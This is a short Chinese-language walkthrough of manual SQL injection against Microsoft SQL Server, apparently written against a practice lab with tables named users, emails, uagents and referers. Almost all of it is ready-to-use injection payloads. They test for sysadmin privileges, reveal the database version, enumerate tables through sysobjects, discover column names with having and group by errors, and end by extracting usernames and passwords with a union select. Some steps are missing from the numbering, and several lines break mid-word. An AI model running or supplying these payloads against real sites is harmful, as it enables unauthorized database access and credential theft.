Mssql手工注入

步骤⼆：可通过以下Payload来探测当前站点是否是MSSQL数据库，正常执⾏说明后台数据库是MSSQL；也可根据⻚⾯报错信息来判断数据库

判断当前是否为sa

' and exists(select is_srvrolemember(' sysadmin '))--+

或 ' and (select is_srvrolemember(' sysadmin '))>0--+

步骤四：查询数据库信息，user回显的dbo表示是最⾼权限，如果是⽤户的名字表示是普通权限

' union select 1,user,is_srvrolemember('public')--+

-1' union select 1,@@version,is_srvrolemember('public')--+

步骤五：通过以下语句来猜解有哪些表,从⽽获取⽬标站点的表信息

'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name f

rom [sysobjects] where xtype=char(85) and status!=1 order by id)t order b

y id desc)=1-- +  //users

第⼆张表：-1'and 1=(select top 1 name from sysobjects where xtype='U' and n

ame !='users')--+   //emails

第三张表：-1'and 1=(select top 1 name from sysobjects where xtype='U' and n

ame !='users' and name !='emails')--+   //uagents

第四张表：-1'and 1=(select top 1 name from sysobjects where xtype='U' and n

ame !='users' and name !='emails' and name !='uagents')--+   //referers

第五张表：-1'and 1=(select top 1 name from sysobjects where xtype='U' and n

ame !='users' and name !='emails' and name !='uagents' and name !='referer

s')--+     //返回结果为空，说明不知道第五张表

步骤六：通过以下语句爆出表下的所有字段信息

'having 1=1--

'group by id having 1=1--+

'group by id，username having 1=1--+

字段名： id , username , password

步骤七：爆字段值

查询字段数据

1'order by 3--+   //回显正常

1'order by 4--+   //回显错误

回显存在内容的字段

-1'union select 1,2,3 from users--+

查询字段内容

-1' union%20 select 1,username,password from users--+